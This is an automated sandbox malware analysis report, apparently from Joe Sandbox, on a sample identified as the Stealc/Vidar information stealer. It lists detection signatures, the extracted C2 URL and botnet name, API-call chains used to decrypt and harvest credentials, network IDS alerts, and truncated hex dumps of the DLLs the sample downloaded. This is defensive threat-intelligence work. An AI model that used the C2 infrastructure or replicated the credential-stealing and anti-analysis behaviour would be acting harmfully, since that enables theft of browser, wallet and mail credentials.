Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538054
MD5: ea1bf920607c9bb2fd526e099bf44660
SHA1: fbd7c63afaac94463f9a5e57bebcdea57ae098e6
SHA256: ecfbc0fbf8e0d515cac5085d1bd1e318aba208b319f1b3e834495f06c364fa43
Tags: exeuser-Bitsight
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.37/ URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/nss3.dll URL Reputation: Label: malware
Source: http://185.215.113.37 URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/mozglue.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/softokn3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/vcruntime140.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/freebl3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/sqlite3.dll URL Reputation: Label: malware
Source: http://185.215.113.37/0d60be0de163924d/msvcp140.dll URL Reputation: Label: malware
Found malware configuration
Source: 0.2.file.exe.6f0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.6f0000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F9B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_006F9B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FC820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_006FC820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_006F7240
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_006F9AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00708EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00708EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C5E6C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.1984825270.000000006C64D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.1985029287.000000006C80F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.1984825270.000000006C64D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00704910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_006FDA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_006FE430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_006FBE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006F16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006F16D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00703EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00703EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006FF6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007038B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_007038B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00704570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_006FED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_006FDE10
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 04:40:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 04:40:16 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 04:40:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 20 Oct 2024 04:40:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 